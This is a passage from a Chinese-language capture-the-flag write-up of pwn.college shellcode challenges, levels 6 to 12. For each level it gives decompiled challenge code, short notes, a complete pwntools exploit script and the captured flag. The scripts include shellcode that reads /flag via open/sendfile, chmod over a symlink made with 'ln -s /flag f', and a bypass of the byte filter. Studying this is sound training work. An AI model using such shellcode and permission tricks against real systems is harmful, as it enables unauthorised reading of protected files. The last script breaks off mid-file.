            return gdb.debug(
22
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
23
            )
24
        else:
25
            return process([elf.path] + (argv or []), env=envp)
26
    else:
27
        return remote(HOST, PORT)
28

29

30
def send_payload(target, payload):
31
    try:
32
        target.send(payload)
33
    except Exception as e:
34
        log.exception(f"An error occurred while sending payload: {e}")
35

36

37
def construct_payload(sled_length):
38
    shellcode = shellcraft.nop() * sled_length
39
    shellcode += """
40
    /* push b'/flag\x00' */
41
    mov rax, 0x101010101010101
42
    push rax
43
    mov rax, 0x101010101010101 ^ 0x67616c662f
44
    xor [rsp], rax
45
    /* call open('rsp', 'O_RDONLY', 'rdx') */
46
    push 2 /* 2 */
47
    pop rax
48
    mov rdi, rsp
49
    xor esi, esi /* O_RDONLY */
50
    inc byte ptr [rip + 1]
51
    .byte 0x0f, 0x04
52
    /* call sendfile(1, 'rax', 0, 0x7fffffff) */
53
    mov r10d, 0x7fffffff
54
    mov rsi, rax
55
    push 40 /* 0x28 */
56
    pop rax
57
    push 1
58
    pop rdi
59
    cdq /* rdx=0 */
60
    inc byte ptr [rip + 1]
61
    .byte 0x0f, 0x04
62
    """
63

64
    return asm(shellcode)
65

66

67
def attack(target, payload):
68
    try:
69
        send_payload(target, payload)
70

71
        response = target.recvall(timeout=5)
72

73
        return b"pwn.college{" in response
74
    except Exception as e:
75
        log.exception(f"An error occurred while performing attack: {e}")
76

77

78
def main():
79
    try:
80
        target = launch()
81
        payload = construct_payload(0x1000)
82

83
        if attack(target, payload):
84
            log.success("Success! Exiting...")
85

86
            pause()
87
            exit()
88
    except Exception as e:
89
        log.exception(f"An error occurred in main: {e}")
90

91

92
if __name__ == "__main__":
93
    main()

Flag#

Flag: pwn.college{kfVRmOzEaLCMSxdS_zQkxZr6BEv.0lMyIDL5cTNxgzW}

Level 7#

Information#

Category: Pwn

Description#

Write and execute shellcode to read the flag, but all file descriptors (including stdin, stderr and stdout!) are closed.

Write-up#


35 collapsed lines
1
int __fastcall main(int argc, const char **argv, const char **envp)
2
{
3
  size_t v3; // rax
4
  size_t v4; // rax
5
  int fd; // [rsp+2Ch] [rbp-14h]
6
  const char **i; // [rsp+30h] [rbp-10h]
7
  const char **j; // [rsp+38h] [rbp-8h]
8

9
  setvbuf(stdin, 0LL, 2, 0LL);
10
  setvbuf(stdout, 0LL, 2, 0LL);
11
  puts("###");
12
  printf("### Welcome to %s!\n", *argv);
13
  puts("###");
14
  putchar(10);
15
  puts(
16
    "This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them");
17
  puts(
18
    "as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will");
19
  puts(
20
    "practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing");
21
  puts("other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.\n");
22
  for ( fd = 3; fd <= 9999; ++fd )
23
    close(fd);
24
  for ( i = argv; *i; ++i )
25
  {
26
    v3 = strlen(*i);
27
    memset((void *)*i, 0, v3);
28
  }
29
  for ( j = envp; *j; ++j )
30
  {
31
    v4 = strlen(*j);
32
    memset((void *)*j, 0, v4);
33
  }
34
  shellcode = mmap((void *)0x2483B000, 0x4000uLL, 7, 34, 0, 0LL);
35
  if ( shellcode != (void *)612610048 )
36
    __assert_fail("shellcode == (void *)0x2483b000", "/challenge/babyshell-level-7.c", 0x62u, "main");
37
  printf("Mapped 0x4000 bytes for shellcode at %p!\n", (const void *)0x2483B000);
38
  puts("Reading 0x4000 bytes from stdin.\n");
39
  shellcode_size = read(0, shellcode, 0x4000uLL);
40
  if ( !shellcode_size )
41
    __assert_fail("shellcode_size > 0", "/challenge/babyshell-level-7.c", 0x67u, "main");
42
  puts("This challenge is about to execute the following shellcode:\n");
2 collapsed lines
43
  print_disassembly(shellcode, shellcode_size);
44
  puts(byte_24A5);
45
  puts(
46
    "This challenge is about to close stdin, which means that it will be harder to pass in a stage-2 shellcode. You will need");
47
  puts("to figure an alternate solution (such as unpacking shellcode in memory) to get past complex filters.\n");
48
  if ( fclose(stdin) )
49
    __assert_fail("fclose(stdin) == 0", "/challenge/babyshell-level-7.c", 0x6Fu, "main");
50
  puts(
51
    "This challenge is about to close stderr, which means that you will not be able to use file descriptor 2 for output.\n");
52
  if ( fclose(stderr) )
53
    __assert_fail("fclose(stderr) == 0", "/challenge/babyshell-level-7.c", 0x72u, "main");
54
  puts(
55
    "This challenge is about to close stdout, which means that you will not be able to use file descriptor 1 for output. You");
56
  puts("will see no further output, and will need to figure out an alternate way of communicating data back to yourself.\n");
57
  if ( fclose(stdout) )
58
    __assert_fail("fclose(stdout) == 0", "/challenge/babyshell-level-7.c", 0x76u, "main");
59
  puts("Executing shellcode!\n");
60
  ((void (*)(void))shellcode)();
61
  puts("### Goodbye!");
62
  return 0;
63
}

~~开玩笑，没有输入输出错误流还能困得住我不成 LOL~~

请原谅我肚子饿了，实在懒得写思路了，现在只想快快恰饭，所以请师傅看 exp。

Exploit#

1
#!/usr/bin/python3
2

3
from pwn import ELF, asm, context, gdb, log, process, remote, shellcraft
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babyshell-level-7"
8
HOST, PORT = "localhost", 1337
9

10
gdbscript = """
11
c
12
"""
13

14

15
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
16
    if local:
17
        elf = ELF(FILE)
18
        context.binary = elf
19

20
        if debug:
21
            return gdb.debug(
22
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
23
            )
24
        else:
25
            return process([elf.path] + (argv or []), env=envp)
26
    else:
27
        return remote(HOST, PORT)
28

29

30
def send_payload(target, payload):
31
    try:
32
        target.send(payload)
33
        target.recvall(timeout=5)
34
    except Exception as e:
35
        log.exception(f"An error occurred while sending payload: {e}")
36

37

38
def construct_payload():
39
    shellcode = shellcraft.open("/flag")
40
    shellcode += """
41
    /* push out_fd */
42
    push rax
43
    """
44
    shellcode += shellcraft.open("./flag", "O_WRONLY | O_CREAT", 0o0644)
45
    shellcode += """
46
    /* sendfile('rax', '[rsp+8]', 0, 0x1000) */
47
    mov rdi, rax
48
    mov rsi, [rsp+0x8]
49
    xor rdx, rdx
50
    mov r10, 0x1000
51
    mov rax, SYS_sendfile
52
    syscall
53
    """
54
    shellcode += shellcraft.exit(0)
55

56
    return asm(shellcode)
57

58

59
def attack(target, payload):
60
    send_payload(target, payload)
61

62
    try:
63
        with open("./flag", "r") as file:
64
            content = file.read()
65

66
            log.success(content)
67
    except FileNotFoundError:
68
        log.error("The file './flag' does not exist.")
69
    except PermissionError:
70
        log.error("Permission denied to read './flag'.")
71
    except Exception as e:
72
        log.exception(f"An error occurred while performing attack: {e}")
73

74

75
def main():
76
    try:
77
        target = launch()
78
        payload = construct_payload()
79

80
        attack(target, payload)
81
    except Exception as e:
82
        log.exception(f"An error occurred in main: {e}")
83

84

85
if __name__ == "__main__":
86
    main()

其实这题用 chmod 写起来更简单一点呢。

Flag#

Flag: pwn.college{Y3UgyYnfUmoR24PWDDkCs1W8h92.01MyIDL5cTNxgzW}

Level 8#

Information#

Category: Pwn

Description#

Write and execute shellcode to read the flag, but you only get 18 bytes.

Write-up#


30 collapsed lines
1
int __fastcall main(int argc, const char **argv, const char **envp)
2
{
3
  size_t v3; // rax
4
  size_t v4; // rax
5
  int fd; // [rsp+2Ch] [rbp-14h]
6
  const char **i; // [rsp+30h] [rbp-10h]
7
  const char **j; // [rsp+38h] [rbp-8h]
8

9
  setvbuf(stdin, 0LL, 2, 0LL);
10
  setvbuf(_bss_start, 0LL, 2, 0LL);
11
  puts("###");
12
  printf("### Welcome to %s!\n", *argv);
13
  puts("###");
14
  putchar(10);
15
  puts(
16
    "This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them");
17
  puts(
18
    "as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will");
19
  puts(
20
    "practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing");
21
  puts("other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.\n");
22
  for ( fd = 3; fd <= 9999; ++fd )
23
    close(fd);
24
  for ( i = argv; *i; ++i )
25
  {
26
    v3 = strlen(*i);
27
    memset((void *)*i, 0, v3);
28
  }
29
  for ( j = envp; *j; ++j )
30
  {
31
    v4 = strlen(*j);
32
    memset((void *)*j, 0, v4);
33
  }
34
  shellcode = mmap((void *)0x205B4000, 0x1000uLL, 7, 34, 0, 0LL);
35
  if ( shellcode != (void *)542851072 )
36
    __assert_fail("shellcode == (void *)0x205b4000", "/challenge/babyshell-level-8.c", 0x62u, "main");
37
  printf("Mapped 0x1000 bytes for shellcode at %p!\n", (const void *)0x205B4000);
38
  puts("Reading 0x12 bytes from stdin.\n");
39
  shellcode_size = read(0, shellcode, 0x12uLL);
40
  if ( !shellcode_size )
41
    __assert_fail("shellcode_size > 0", "/challenge/babyshell-level-8.c", 0x67u, "main");
42
  puts("Removing write permissions from first 4096 bytes of shellcode.\n");
43
  if ( mprotect(shellcode, 0x1000uLL, 5) )
44
    __assert_fail(
45
      "mprotect(shellcode, 4096, PROT_READ|PROT_EXEC) == 0",
46
      "/challenge/babyshell-level-8.c",
47
      0x6Au,
48
      "main");
49
  puts("This challenge is about to execute the following shellcode:\n");
50
  print_disassembly(shellcode, shellcode_size);
51
  puts(&byte_251D);
52
  puts("Executing shellcode!\n");
53
  ((void (*)(void))shellcode)();
54
  puts("### Goodbye!");
55
  return 0;
56
}

这题在读取数据大小上做了限制，只允许读入 18 bytes。并且读完后把 buf 的写权限移除了，因此我们不能通过类似 read 的这种 shellcode 把再读数据到别的地方之类的。execve 肯定也不可能了，明显会超过 18 bytes。这时候我们发现 chmod 是一个很不错的候选，但是不能直接对 /flag 使用 chmod，不然还是会超。不过既然超的原因是文件名太长，那我们不妨试试建立一个名称短一点的软链接，对软链接进行操作。实测发现对软链接使用 chmod 会影响到源文件的权限。

Exploit#

1
#!/usr/bin/python3
2

3
from pwn import ELF, asm, context, gdb, log, os, process, remote, shellcraft
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babyshell-level-8"
8
HOST, PORT = "localhost", 1337
9

10
gdbscript = """
11
c
12
"""
13

14

15
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
16
    if local:
17
        elf = ELF(FILE)
18
        context.binary = elf
19

20
        if debug:
21
            return gdb.debug(
22
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
23
            )
24
        else:
25
            return process([elf.path] + (argv or []), env=envp)
26
    else:
27
        return remote(HOST, PORT)
28

29

30
def send_payload(target, payload):
31
    try:
32
        target.send(payload)
33
        target.recvall(timeout=5)
34
    except Exception as e:
35
        log.exception(f"An error occurred while sending payload: {e}")
36

37

38
def construct_payload():
39
    shellcode = shellcraft.chmod("f", 0o4)
40

41
    return asm(shellcode)
42

43

44
def attack(target, payload):
45
    os.system("ln -s /flag f")
46
    send_payload(target, payload)
47

48
    try:
49
        with open("./f", "r") as file:
50
            content = file.read()
51

52
            log.success(content)
53
    except FileNotFoundError:
54
        log.error("The file './f' does not exist.")
55
    except PermissionError:
56
        log.error("Permission denied to read './f'.")
57
    except Exception as e:
58
        log.exception(f"An error occurred while performing attack: {e}")
59

60

61
def main():
62
    try:
63
        target = launch()
64
        payload = construct_payload()
65

66
        attack(target, payload)
67
    except Exception as e:
68
        log.exception(f"An error occurred in main: {e}")
69

70

71
if __name__ == "__main__":
72
    main()

Flag#

Flag: pwn.college{swqZOtc9CdQUIFCMwrec4E5WBCi.0FNyIDL5cTNxgzW}

Level 9#

Information#

Category: Pwn

Description#

Write and execute shellcode to read the flag, but your input has data inserted into it before being executed.

Write-up#


36 collapsed lines
1
int __fastcall main(int argc, const char **argv, const char **envp)
2
{
3
  size_t v3; // rax
4
  size_t v4; // rax
5
  int fd; // [rsp+28h] [rbp-18h]
6
  int k; // [rsp+2Ch] [rbp-14h]
7
  const char **i; // [rsp+30h] [rbp-10h]
8
  const char **j; // [rsp+38h] [rbp-8h]
9

10
  setvbuf(stdin, 0LL, 2, 0LL);
11
  setvbuf(_bss_start, 0LL, 2, 0LL);
12
  puts("###");
13
  printf("### Welcome to %s!\n", *argv);
14
  puts("###");
15
  putchar(10);
16
  puts(
17
    "This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them");
18
  puts(
19
    "as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will");
20
  puts(
21
    "practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing");
22
  puts("other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.\n");
23
  for ( fd = 3; fd <= 9999; ++fd )
24
    close(fd);
25
  for ( i = argv; *i; ++i )
26
  {
27
    v3 = strlen(*i);
28
    memset((void *)*i, 0, v3);
29
  }
30
  for ( j = envp; *j; ++j )
31
  {
32
    v4 = strlen(*j);
33
    memset((void *)*j, 0, v4);
34
  }
35
  shellcode = mmap((void *)0x2A207000, 0x1000uLL, 7, 34, 0, 0LL);
36
  if ( shellcode != (void *)706768896 )
37
    __assert_fail("shellcode == (void *)0x2a207000", "/challenge/babyshell-level-9.c", 0x62u, "main");
38
  printf("Mapped 0x1000 bytes for shellcode at %p!\n", (const void *)0x2A207000);
39
  puts("Reading 0x1000 bytes from stdin.\n");
40
  shellcode_size = read(0, shellcode, 0x1000uLL);
41
  if ( !shellcode_size )
42
    __assert_fail("shellcode_size > 0", "/challenge/babyshell-level-9.c", 0x67u, "main");
43
  puts("Executing filter...\n");
44
  for ( k = 0; k < (unsigned __int64)shellcode_size; ++k )
45
  {
46
    if ( k / 10 % 2 == 1 )
47
      *((_BYTE *)shellcode + k) = -52;
48
  }
49
  puts("This challenge modified your shellcode by overwriting every other 10 bytes with 0xcc. 0xcc, when interpreted as an");
50
  puts(
51
    "instruction is an `INT 3`, which is an interrupt to call into the debugger. You must avoid these modifications in your");
9 collapsed lines
52
  puts("shellcode.\n");
53
  puts("Removing write permissions from first 4096 bytes of shellcode.\n");
54
  if ( mprotect(shellcode, 0x1000uLL, 5) )
55
    __assert_fail(
56
      "mprotect(shellcode, 4096, PROT_READ|PROT_EXEC) == 0",
57
      "/challenge/babyshell-level-9.c",
58
      0x76u,
59
      "main");
60
  puts("This challenge is about to execute the following shellcode:\n");
61
  print_disassembly(shellcode, shellcode_size);
62
  puts(&byte_2635);
63
  puts("Executing shellcode!\n");
64
  ((void (*)(void))shellcode)();
65
  puts("### Goodbye!");
66
  return 0;
67
}

这题每隔 0xa 字节使用 0xa 个 int3 中断替换 0xa 字节的指令。简单吧，每隔 0xa 字节给它塞 0xa 个 nop 好了，随它换。在此之前使用一条 jmp 跳转到 int3 之后确保不被 int3 干扰，继续执行就好了。

Exploit#

1
#!/usr/bin/python3
2

3
from pwn import ELF, asm, context, gdb, log, os, process, remote
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babyshell-level-9"
8
HOST, PORT = "localhost", 1337
9

10
gdbscript = """
11
c
12
"""
13

14

15
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
16
    if local:
17
        elf = ELF(FILE)
18
        context.binary = elf
19

20
        if debug:
21
            return gdb.debug(
22
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
23
            )
24
        else:
25
            return process([elf.path] + (argv or []), env=envp)
26
    else:
27
        return remote(HOST, PORT)
28

29

30
def send_payload(target, payload):
31
    try:
32
        target.send(payload)
33
        target.recvall(timeout=5)
34
    except Exception as e:
35
        log.exception(f"An error occurred while sending payload: {e}")
36

37

38
def construct_payload():
39
    shellcode = """
40
    /* chmod(file='f', mode=4) */
41
    /* push b'f\x00' */
42
    push 0x66
43
    mov rdi, rsp
44
    push 4
45
    pop rsi
46
    /* call chmod() */
47
    jmp continue
48
    .rept 0xa
49
        nop
50
    .endr
51
continue:
52
    push 90 /* 0x5a */
53
    pop rax
54
    syscall
55
    """
56

57
    return asm(shellcode)
58

59

60
def attack(target, payload):
61
    os.system("ln -s /flag f")
62
    send_payload(target, payload)
63

64
    try:
65
        with open("./f", "r") as file:
66
            content = file.read()
67

68
            log.success(content)
69
    except FileNotFoundError:
70
        log.error("The file './f' does not exist.")
71
    except PermissionError:
72
        log.error("Permission denied to read './f'.")
73
    except Exception as e:
74
        log.exception(f"An error occurred while performing attack: {e}")
75

76

77
def main():
78
    try:
79
        target = launch()
80
        payload = construct_payload()
81

82
        attack(target, payload)
83
    except Exception as e:
84
        log.exception(f"An error occurred in main: {e}")
85

86

87
if __name__ == "__main__":
88
    main()

Flag#

Flag: pwn.college{YzFX3cOrT5abYZfD8oqct1wr3xc.0VNyIDL5cTNxgzW}

Level 10#

Information#

Category: Pwn

Description#

Write and execute shellcode to read the flag, but your input is sorted before being executed!

Write-up#


40 collapsed lines
1
int __fastcall main(int argc, const char **argv, const char **envp)
2
{
3
  size_t v3; // rax
4
  size_t v4; // rax
5
  int fd; // [rsp+28h] [rbp-38h]
6
  int k; // [rsp+2Ch] [rbp-34h]
7
  int m; // [rsp+30h] [rbp-30h]
8
  int v10; // [rsp+34h] [rbp-2Ch]
9
  const char **i; // [rsp+38h] [rbp-28h]
10
  const char **j; // [rsp+40h] [rbp-20h]
11
  _QWORD *v13; // [rsp+48h] [rbp-18h]
12
  __int64 v14; // [rsp+50h] [rbp-10h]
13

14
  setvbuf(stdin, 0LL, 2, 0LL);
15
  setvbuf(_bss_start, 0LL, 2, 0LL);
16
  puts("###");
17
  printf("### Welcome to %s!\n", *argv);
18
  puts("###");
19
  putchar(10);
20
  puts(
21
    "This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them");
22
  puts(
23
    "as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will");
24
  puts(
25
    "practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing");
26
  puts("other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.\n");
27
  for ( fd = 3; fd <= 9999; ++fd )
28
    close(fd);
29
  for ( i = argv; *i; ++i )
30
  {
31
    v3 = strlen(*i);
32
    memset((void *)*i, 0, v3);
33
  }
34
  for ( j = envp; *j; ++j )
35
  {
36
    v4 = strlen(*j);
37
    memset((void *)*j, 0, v4);
38
  }
39
  shellcode = mmap((void *)0x24AA2000, 0x1000uLL, 7, 34, 0, 0LL);
40
  if ( shellcode != (void *)615129088 )
41
    __assert_fail("shellcode == (void *)0x24aa2000", "/challenge/babyshell-level-10.c", 0x62u, "main");
42
  printf("Mapped 0x1000 bytes for shellcode at %p!\n", (const void *)0x24AA2000);
43
  puts("Reading 0x1000 bytes from stdin.\n");
44
  shellcode_size = read(0, shellcode, 0x1000uLL);
45
  if ( !shellcode_size )
46
    __assert_fail("shellcode_size > 0", "/challenge/babyshell-level-10.c", 0x67u, "main");
47
  puts("Executing filter...\n");
48
  v13 = shellcode;
49
  v10 = ((unsigned __int64)shellcode_size >> 3) - 1;
50
  for ( k = 0; k < v10; ++k )
51
  {
52
    for ( m = 0; m < v10 - k - 1; ++m )
53
    {
54
      if ( v13[m] > v13[m + 1] )
55
      {
56
        v14 = v13[m];
57
        v13[m] = v13[m + 1];
58
        v13[m + 1] = v14;
59
      }
60
    }
61
  }
62
  puts(
63
    "This challenge just sorted your shellcode using bubblesort. Keep in mind the impact of memory endianness on this sort");
64
  puts("(e.g., the LSB being the right-most byte).\n");
2 collapsed lines
65
  printf("This sort processed your shellcode %d bytes at a time.\n", 8);
66
  puts("This challenge is about to execute the following shellcode:\n");
67
  print_disassembly(shellcode, shellcode_size);
68
  puts(&byte_259D);
69
  puts("Executing shellcode!\n");
70
  ((void (*)(void))shellcode)();
71
  puts("### Goodbye!");
72
  return 0;
73
}

如果你的 shellcode 足够长的话会对部分指令进行冒泡排序，但是如果比较短的话这个限制就形同虚设了。这里我直接用之前的 exp 了。

Exploit#

1
#!/usr/bin/python3
2

3
from pwn import ELF, asm, context, gdb, log, os, process, remote, shellcraft
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babyshell-level-10"
8
HOST, PORT = "localhost", 1337
9

10
gdbscript = """
11
c
12
"""
13

14

15
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
16
    if local:
17
        elf = ELF(FILE)
18
        context.binary = elf
19

20
        if debug:
21
            return gdb.debug(
22
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
23
            )
24
        else:
25
            return process([elf.path] + (argv or []), env=envp)
26
    else:
27
        return remote(HOST, PORT)
28

29

30
def send_payload(target, payload):
31
    try:
32
        target.send(payload)
33
        target.recvall(timeout=5)
34
    except Exception as e:
35
        log.exception(f"An error occurred while sending payload: {e}")
36

37

38
def construct_payload():
39
    shellcode = shellcraft.chmod("f", 0o4)
40

41
    return asm(shellcode)
42

43

44
def attack(target, payload):
45
    os.system("ln -s /flag f")
46
    send_payload(target, payload)
47

48
    try:
49
        with open("./f", "r") as file:
50
            content = file.read()
51

52
            log.success(content)
53
    except FileNotFoundError:
54
        log.error("The file './f' does not exist.")
55
    except PermissionError:
56
        log.error("Permission denied to read './f'.")
57
    except Exception as e:
58
        log.exception(f"An error occurred while performing attack: {e}")
59

60

61
def main():
62
    try:
63
        target = launch()
64
        payload = construct_payload()
65

66
        attack(target, payload)
67
    except Exception as e:
68
        log.exception(f"An error occurred in main: {e}")
69

70

71
if __name__ == "__main__":
72
    main()

Flag#

Flag: pwn.college{g5e9JB4cUp4THYN75FdmwWgVFA3.0lNyIDL5cTNxgzW}

Level 11#

Information#

Category: Pwn

Description#

Write and execute shellcode to read the flag, but your input is sorted before being executed and stdin is closed.

Write-up#


40 collapsed lines
1
int __fastcall main(int argc, const char **argv, const char **envp)
2
{
3
  size_t v3; // rax
4
  size_t v4; // rax
5
  int fd; // [rsp+28h] [rbp-38h]
6
  int k; // [rsp+2Ch] [rbp-34h]
7
  int m; // [rsp+30h] [rbp-30h]
8
  int v10; // [rsp+34h] [rbp-2Ch]
9
  const char **i; // [rsp+38h] [rbp-28h]
10
  const char **j; // [rsp+40h] [rbp-20h]
11
  _QWORD *v13; // [rsp+48h] [rbp-18h]
12
  __int64 v14; // [rsp+50h] [rbp-10h]
13

14
  setvbuf(stdin, 0LL, 2, 0LL);
15
  setvbuf(_bss_start, 0LL, 2, 0LL);
16
  puts("###");
17
  printf("### Welcome to %s!\n", *argv);
18
  puts("###");
19
  putchar(10);
20
  puts(
21
    "This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them");
22
  puts(
23
    "as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will");
24
  puts(
25
    "practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing");
26
  puts("other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.\n");
27
  for ( fd = 3; fd <= 9999; ++fd )
28
    close(fd);
29
  for ( i = argv; *i; ++i )
30
  {
31
    v3 = strlen(*i);
32
    memset((void *)*i, 0, v3);
33
  }
34
  for ( j = envp; *j; ++j )
35
  {
36
    v4 = strlen(*j);
37
    memset((void *)*j, 0, v4);
38
  }
39
  shellcode = mmap((void *)0x21A35000, 0x1000uLL, 7, 34, 0, 0LL);
40
  if ( shellcode != (void *)564350976 )
41
    __assert_fail("shellcode == (void *)0x21a35000", "/challenge/babyshell-level-11.c", 0x62u, "main");
42
  printf("Mapped 0x1000 bytes for shellcode at %p!\n", (const void *)0x21A35000);
43
  puts("Reading 0x1000 bytes from stdin.\n");
44
  shellcode_size = read(0, shellcode, 0x1000uLL);
45
  if ( !shellcode_size )
46
    __assert_fail("shellcode_size > 0", "/challenge/babyshell-level-11.c", 0x67u, "main");
47
  puts("Executing filter...\n");
48
  v13 = shellcode;
49
  v10 = ((unsigned __int64)shellcode_size >> 3) - 1;
50
  for ( k = 0; k < v10; ++k )
51
  {
52
    for ( m = 0; m < v10 - k - 1; ++m )
53
    {
54
      if ( v13[m] > v13[m + 1] )
55
      {
56
        v14 = v13[m];
57
        v13[m] = v13[m + 1];
58
        v13[m + 1] = v14;
59
      }
60
    }
61
  }
62
  puts(
63
    "This challenge just sorted your shellcode using bubblesort. Keep in mind the impact of memory endianness on this sort");
64
  puts("(e.g., the LSB being the right-most byte).\n");
4 collapsed lines
65
  printf("This sort processed your shellcode %d bytes at a time.\n", 8);
66
  puts("This challenge is about to execute the following shellcode:\n");
67
  print_disassembly(shellcode, shellcode_size);
68
  puts(byte_259D);
69
  puts(
70
    "This challenge is about to close stdin, which means that it will be harder to pass in a stage-2 shellcode. You will need");
71
  puts("to figure an alternate solution (such as unpacking shellcode in memory) to get past complex filters.\n");
72
  if ( fclose(stdin) )
73
    __assert_fail("fclose(stdin) == 0", "/challenge/babyshell-level-11.c", 0x7Fu, "main");
74
  puts("Executing shellcode!\n");
75
  ((void (*)(void))shellcode)();
76
  puts("### Goodbye!");
77
  return 0;
78
}

就算你把 stdin 也关了又如何，不还是无法阻止我使用之前的 exp 哈哈哈哈哈哈哈。

Exploit#

1
#!/usr/bin/python3
2

3
from pwn import ELF, asm, context, gdb, log, os, process, remote, shellcraft
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babyshell-level-11"
8
HOST, PORT = "localhost", 1337
9

10
gdbscript = """
11
c
12
"""
13

14

15
def launch(local=True, debug=False, aslr=False, argv=None, envp=None):
16
    if local:
17
        elf = ELF(FILE)
18
        context.binary = elf
19

20
        if debug:
21
            return gdb.debug(
22
                [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
23
            )
24
        else:
25
            return process([elf.path] + (argv or []), env=envp)
26
    else:
27
        return remote(HOST, PORT)
28

29

30
def send_payload(target, payload):
31
    try:
32
        target.send(payload)
33
        target.recvall(timeout=5)
34
    except Exception as e:
35
        log.exception(f"An error occurred while sending payload: {e}")
36

37

38
def construct_payload():
39
    shellcode = shellcraft.chmod("f", 0o4)
40

41
    return asm(shellcode)
42

43

44
def attack(target, payload):
45
    os.system("ln -s /flag f")
46
    send_payload(target, payload)
47

48
    try:
49
        with open("./f", "r") as file:
50
            content = file.read()
51

52
            log.success(content)
53
    except FileNotFoundError:
54
        log.error("The file './f' does not exist.")
55
    except PermissionError:
56
        log.error("Permission denied to read './f'.")
57
    except Exception as e:
58
        log.exception(f"An error occurred while performing attack: {e}")
59

60

61
def main():
62
    try:
63
        target = launch()
64
        payload = construct_payload()
65

66
        attack(target, payload)
67
    except Exception as e:
68
        log.exception(f"An error occurred in main: {e}")
69

70

71
if __name__ == "__main__":
72
    main()

Flag#

Flag: pwn.college{Ed61x95iAxED3sEmx4x19WauOCW.01NyIDL5cTNxgzW}

Level 12#

Information#

Category: Pwn

Description#

Write and execute shellcode to read the flag, but every byte in your input must be unique.

Write-up#


38 collapsed lines
1
int __fastcall main(int argc, const char **argv, const char **envp)
2
{
3
  size_t v3; // rax
4
  size_t v4; // rax
5
  int fd; // [rsp+28h] [rbp-128h]
6
  int k; // [rsp+2Ch] [rbp-124h]
7
  const char **i; // [rsp+30h] [rbp-120h]
8
  const char **j; // [rsp+38h] [rbp-118h]
9
  _QWORD v11[34]; // [rsp+40h] [rbp-110h] BYREF
10

11
  v11[33] = __readfsqword(0x28u);
12
  setvbuf(stdin, 0LL, 2, 0LL);
13
  setvbuf(_bss_start, 0LL, 2, 0LL);
14
  puts("###");
15
  printf("### Welcome to %s!\n", *argv);
16
  puts("###");
17
  putchar(10);
18
  puts(
19
    "This challenge reads in some bytes, modifies them (depending on the specific challenge configuration), and executes them");
20
  puts(
21
    "as code! This is a common exploitation scenario, called `code injection`. Through this series of challenges, you will");
22
  puts(
23
    "practice your shellcode writing skills under various constraints! To ensure that you are shellcoding, rather than doing");
24
  puts("other tricks, this will sanitize all environment variables and arguments and close all file descriptors > 2.\n");
25
  for ( fd = 3; fd <= 9999; ++fd )
26
    close(fd);
27
  for ( i = argv; *i; ++i )
28
  {
29
    v3 = strlen(*i);
30
    memset((void *)*i, 0, v3);
31
  }
32
  for ( j = envp; *j; ++j )
33
  {
34
    v4 = strlen(*j);
35
    memset((void *)*j, 0, v4);
36
  }
37
  shellcode = mmap((void *)0x1C246000, 0x1000uLL, 7, 34, 0, 0LL);
38
  if ( shellcode != (void *)472145920 )
39
    __assert_fail("shellcode == (void *)0x1c246000", "/challenge/babyshell-level-12.c", 0x62u, "main");
40
  printf("Mapped 0x1000 bytes for shellcode at %p!\n", (const void *)0x1C246000);
41
  puts("Reading 0x1000 bytes from stdin.\n");
42
  shellcode_size = read(0, shellcode, 0x1000uLL);
43
  if ( !shellcode_size )
44
    __assert_fail("shellcode_size > 0", "/challenge/babyshell-level-12.c", 0x67u, "main");
45
  puts("Executing filter...\n");
46
  puts("This challenge requires that every byte in your shellcode is unique!\n");
47
  memset(v11, 0, 256);
48
  for ( k = 0; k < (unsigned __int64)shellcode_size; ++k )
49
  {
50
    if ( *((_BYTE *)v11 + *((unsigned __int8 *)shellcode + k)) )
51
    {
52
      printf("Failed filter at byte %d!\n", k);
53
      exit(1);
54
    }
55
    *((_BYTE *)v11 + *((unsigned __int8 *)shellcode + k)) = 1;
56
  }
57
  puts("This challenge is about to execute the following shellcode:\n");
58
  print_disassembly(shellcode, shellcode_size);
59
  puts(&byte_2525);
60
  puts("Executing shellcode!\n");
61
  ((void (*)(void))shellcode)();
62
  puts("### Goodbye!");
63
  return 0;
64
}

就你要每一个字节都得唯一是吧，execve 调用外部 shellcode 秒了！

cdq 是一字节指令，有时候用来取代 xor edx, edx 很不错。它的作用请参考 CWD/CDQ/CQO — Convert Word to Doubleword/Convert Doubleword to Quadword.

Exploit#

1
#!/usr/bin/python3
2

3
from pwn import ELF, asm, context, gdb, log, pause, process, remote
4

5
context(log_level="debug", terminal="kitty")
6

7
FILE = "./babyshell-level-12"
8
